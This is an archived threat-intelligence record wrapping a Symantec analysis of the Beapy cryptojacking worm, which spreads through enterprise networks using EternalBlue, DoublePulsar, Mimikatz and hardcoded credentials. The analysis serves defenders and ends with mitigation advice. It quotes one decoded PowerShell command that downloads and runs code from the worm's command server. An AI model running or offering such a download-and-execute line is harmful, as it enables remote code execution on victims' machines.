{ "id": "642e9b98-9b32-4353-89a5-7c1df348bfe7", "created_at": "2026-04-06T01:31:02.974854Z", "updated_at": "2026-04-10T03:26:53.367451Z", "deleted_at": null, "sha1_hash": "1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713", "title": "Beapy: Cryptojacking Worm Hits Enterprises in China", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 65442, "plain_text": "Beapy: Cryptojacking Worm Hits Enterprises in China\r\nBy About the Author\r\nArchived: 2026-04-06 00:17:26 UTC\r\nBeapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and\r\nhardcoded credentials to spread rapidly across networks. Beapy activity was first seen in Symantec telemetry in\r\nJanuary 2019. This activity has also been seen on web servers and has been increasing since the beginning of\r\nMarch.\r\nBeapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector. This campaign\r\ndemonstrates that while cryptojacking has declined in popularity with cyber criminals since its peak at the start of\r\n2018, it is still a focus for some of them, with enterprises now their primary target.\r\nAlmost all of Beapy’s victims are enterprises (Figure 1). Beapy may indicate a continuation of a trend\r\ndemonstrated by the Bluwimps worm (MSH.Bluwimps) in 2018 and which we mentioned in ISTR 24—an\r\nincreased focus by cryptojacking criminals on enterprises. While we have no evidence these attacks are targeted,\r\nBeapy’s wormlike capabilities indicate that it was probably always intended to spread throughout enterprise\r\nnetworks.\r\nFigure 1. Enterprise vs consumer infections of Beapy\r\nFigure 1. Enterprise vs consumer infections of Beapy\r\nThis mirrors a trend we saw in ransomware in 2018 too when, despite a drop in overall ransomware infections of\r\n20 percent, ransomware infections in enterprises increased by 12 percent. Enterprises appear to be an increasing\r\nfocus for cyber criminals.\r\nBeapy is most heavily affecting enterprises in Asia, with more than 80 percent of its victims located in China, with\r\nother victims in South Korea, Japan, and Vietnam.\r\nFigure 2. Beapy infections by region\r\nFigure 2. Beapy infections by region\r\nInfection chain\r\nMalicious emails are the initial vector for at least some Beapy infections. A malicious Excel document is delivered\r\nto victims as an email attachment. If the email recipient opens the malicious attachment, the DoublePulsar\r\nbackdoor (Backdoor.Doublepulsar) is downloaded onto the target machine. DoublePulsar, like EternalBlue, was\r\nleaked in the Shadow Brokers dump and was also used in the destructive WannaCry ransomware attack in 2017.\r\nDoublePulsar opens a backdoor on infected machines and allows for remote code execution on compromised\r\ncomputers. EternalBlue exploits a vulnerability in the Windows SMB protocol to allow files to spread laterally\r\nacross networks.\r\nhttps://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china\r\nPage 1 of 4\n\nOnce DoublePulsar is installed, a PowerShell command is executed, and contact is made with the Beapy\r\ncommand and control (C\u0026C) server, before a coinminer is downloaded onto the target computer. If we look at one\r\nexample of a machine in Symantec telemetry, we see the earliest signs of suspicious activity on February 15,\r\n2019, when the DoublePulsar backdoor is detected. We then see a PowerShell command being launched, which\r\ndecodes to the following:\r\nIEX (New-Object Net.WebClient).downloadstring(' http://v.beahh.com/v' +$env:USERDOMAIN)\r\nThis is the device contacting the Beapy C\u0026C server. Some more PowerShell commands are executed and then a\r\nMonero coinminer is downloaded. This process is repeated as Beapy spreads to other computers on the network.\r\nBeapy appears to use unpatched machines to get a foothold on the network, and then uses EternalBlue to spread to\r\nother machines. However, EternalBlue isn’t Beapy’s only propagation technique, and it also uses the credential-stealing tool Hacktool.Mimikatz to attempt to collect credentials from infected computers. It can use those to\r\nspread to even patched machines on the network. Beapy also uses a hardcoded list of usernames and passwords to\r\nattempt to spread across networks. This is similar to how the Bluwimps worm operated. Bluwimps infected\r\nthousands of enterprise machines with coinminers in 2017 and 2018.\r\nWeb servers\r\nSymantec telemetry also found an earlier version of Beapy on a public-facing web server, with the worm then\r\nattempting to spread to computers connected to that server. One of the ways it appears to do this is by generating a\r\nlist of IP addresses it attempts to infect.\r\nThe version of Beapy seen on the web server is an early version of the malware, coded in C rather than Python,\r\nlike later versions. However, the activity is similar, with the downloaded malware also containing Mimikatz\r\nmodules for credential harvesting, as well as EternalBlue exploit capabilities.\r\nIn the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638).\r\nThis vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.\r\nBeapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic\r\nServer (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts\r\nbegan in early February, with connections to Beapy’s C\u0026C server first observed on March 13. Activity targeting\r\nthis web server continued until early April.\r\nIn general, Beapy activity has been increasing since the beginning of March.\r\nFigure 3. A sharp increase in Beapy detections is clearly visible\r\nFigure 3. A sharp increase in Beapy detections is clearly visible\r\nWhat does Beapy’s activity tell us?\r\nDespite the drop in cryptojacking activity in 2018, when there was a 52 percent drop in cryptojacking, this is still\r\nan area of interest for cyber criminals. Looking at the overall figures for cryptojacking, we can see that there were\r\njust under 3 million cryptojacking attempts in March 2019. While a big drop from the peak of February 2018,\r\nwhen there were 8 million cryptojacking attempts, it is still a significant figure.\r\nhttps://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china\r\nPage 2 of 4\n\nFigure 4. Cryptojacking activity, January 2018 to March 2019\r\nFigure 4. Cryptojacking activity, January 2018 to March 2019\r\nBeapy is a file-based coinminer, which is interesting as most of the cryptojacking activity we saw at the height of\r\nits popularity was carried out using browser-based coinminers, which were popular due to lower barriers to entry\r\nand because they allowed even fully patched machines to be targeted. The announcement that the Coinhive coin-mining service, which was launched in September 2017 and played a key role in the growth of cryptojacking, was\r\nclosing down also probably contributed to the fall in browser-based cryptojacking. The service, which made it a\r\nlot easier for anyone to carry out browser-based coin mining, ceased operations at the start of March. The\r\nshuttering of this service is likely to have a dramatic impact on browser-based cryptojacking.\r\nAs well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers\r\nbecause they can mine cryptocurrency faster. The Monero cryptocurrency, which is the cryptocurrency most\r\ncommonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that\r\nminers that can create more cryptocurrency faster are now more popular with cyber criminals.\r\nFigure 5. Comparing profitability of browser-based and file-based coin-mining botnets\r\nFigure 5. Comparing profitability of browser-based and file-based coin-mining botnets\r\nEffects of cryptojacking on enterprises\r\nWhile enterprises might think they don’t need to worry about cryptojacking as much as more disruptive threats\r\nsuch as ransomware, it could still have a major impact on the company’s operations.\r\nPotential impacts of cryptojacking for businesses include:\r\nA slowdown in devices’ performance, potentially leading to employee frustration and a reduction in\r\nproductivity\r\nOverheating batteries\r\nDevices becoming degraded and unusable, leading to higher IT costs\r\nIncreased costs due to increased electricity usage, and for businesses operating in the cloud that are billed\r\nbased on CPU usage\r\nEnterprises need to ensure their networks are protected from the whole range of cyber security threats.\r\nMitigation\r\nEmphasize multiple, overlapping, and mutually supportive defensive systems to guard against single point\r\nfailures in any specific technology or protection method. This includes deployment of endpoint, email, and\r\nweb gateway protection technologies as well as firewalls and vulnerability assessment solutions. Always\r\nkeep these security solutions up to date with the latest protection capabilities.\r\nEducate anyone using your device or network and urge them to exercise caution around emails from\r\nunfamiliar sources and around opening attachments that haven’t been solicited, which may contain file-based coin-mining malware.\r\nhttps://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china\r\nPage 3 of 4\n\nEducate employees about the signs that indicate their computer may have a coinminer and instruct them to\r\ninform IT immediately if they think there may be a coinminer on a device that is on the company network.\r\nMonitor battery usage on your device and, if you notice a suspicious spike in usage, scan it for the presence\r\nof any file-based miners.\r\nInstall the latest patches on your devices, use strong passwords and enable two-factor authentication.\r\nProtection\r\nSymantec has the following protection in place to protect customers against these kinds of attacks:\r\nW32.Beapy\r\nHacktool.Mimikatz\r\nMSH.Bluwimps\r\nBackdoor.Doublepulsar\r\nSymantec Email Security.cloud technology blocks email spreading this threat using advanced heuristics.\r\nFurther Reading\r\nFor more information about cryptojacking, read our whitepaper:\r\n Cryptojacking: A Modern Cash Cow\r\nBeapy: Cryptojacking Worm Hits Enterprises in China\r\nThreat Hunter Team\r\nThreat Hunter Team\r\nSymantec and Carbon Black\r\nSource: https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china\r\nhttps://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china" ], "report_names": [ "beapy-cryptojacking-worm-china" ], "threat_actors": [ { "id": "d4f7cf97-9c98-409c-8b95-b80d14c576a5", "created_at": "2022-10-25T16:07:24.561104Z", "updated_at": "2026-04-10T02:00:05.03343Z", "deleted_at": null, "main_name": "Shadow Brokers", "aliases": [], "source_name": "ETDA:Shadow Brokers", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "171b85f2-8f6f-46c0-92e0-c591f61ea167", "created_at": "2023-01-06T13:46:38.830188Z", "updated_at": "2026-04-10T02:00:03.114926Z", "deleted_at": null, "main_name": "The Shadow Brokers", "aliases": [ "Shadow Brokers", "ShadowBrokers", "The ShadowBrokers", "TSB" ], "source_name": "MISPGALAXY:The Shadow Brokers", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775439062, "ts_updated_at": 1775791613, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713.pdf", "text": "https://archive.orkl.eu/1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713.txt", "img": "https://archive.orkl.eu/1f80ec05ca892bc76c3f5dccc635bf5ad5bc5713.jpg" } }